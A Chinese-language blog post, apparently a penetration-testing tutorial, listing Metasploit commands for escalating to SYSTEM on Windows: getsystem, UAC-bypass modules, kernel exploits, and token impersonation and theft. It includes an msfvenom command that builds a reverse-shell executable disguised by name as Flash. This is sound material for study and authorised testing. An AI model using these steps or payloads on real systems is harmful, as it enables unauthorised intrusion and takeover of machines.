Metasploit(MSF)的一些提权方法

1.getsystem

首先敲msf自带的getsystem试下运气,成功就万事大吉。
在这里插入图片描述

2.bypassuac

内置多个pypassuac脚本,原理有所不同,使用方法类似,运行后返回一个新的会话,需要再次执行getsystem获取系统权限,如:

use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask

如使用bypassuac.rb脚本:

msf > use exploit/windows/local/bypassuac
msf > set SESSION 2
msf > run

Metasploit(MSF)的一些提权方法_第1张图片

3.内核提权

这里先利用enum_patches模块 收集补丁信息,然后查找可用的exploits进行提权

meterpreter > run post/windows/gather/enum_patches  #查看补丁信息
msf > use exploit/windows/local/ms13_053_schlamperei  #使用具体的exp,根据列出的具体可用exp而定
msf > set SESSION 2   
msf > exploit

Metasploit(MSF)的一些提权方法_第2张图片
也可以使用local_exploit_suggester进行查询哪些exp可以用,例如
Metasploit(MSF)的一些提权方法_第3张图片
Metasploit(MSF)的一些提权方法_第4张图片

这里提一句,有些exp是针对生成的x86或是x64版本的,所以在生成的时候也要根据目标主机生成不同 位数的exe

root@kali:~# msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.80.142 lport=443 -f exe X > flash_win7.exe 
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload         #这里选择x64版本
No encoder or badchars specified, outputting raw payload
Payload size: 1188911 bytes

4.令牌操纵

(1)incognito假冒令牌

use incognito      							#help incognito  查看帮助
list_tokens -u   							#查看可用的token
impersonate_token 'NT AUTHORITY\SYSTEM' 		#假冒SYSTEM token
或者impersonate_token NT\ AUTHORITY\\SYSTEM		#不加单引号 需使用\\
execute -f cmd.exe -i –t                        # -t 使用假冒的token 执行
                                                #或者直接shell
rev2self   										#返回原始token

Metasploit(MSF)的一些提权方法_第5张图片

(2)steal_token窃取令牌

steal_token 	#从指定进程中窃取token   先ps列出可用的值
drop_token			#删除窃取的token

Metasploit(MSF)的一些提权方法_第6张图片

你可能感兴趣的:(复现与实战,msf提权,metasploit)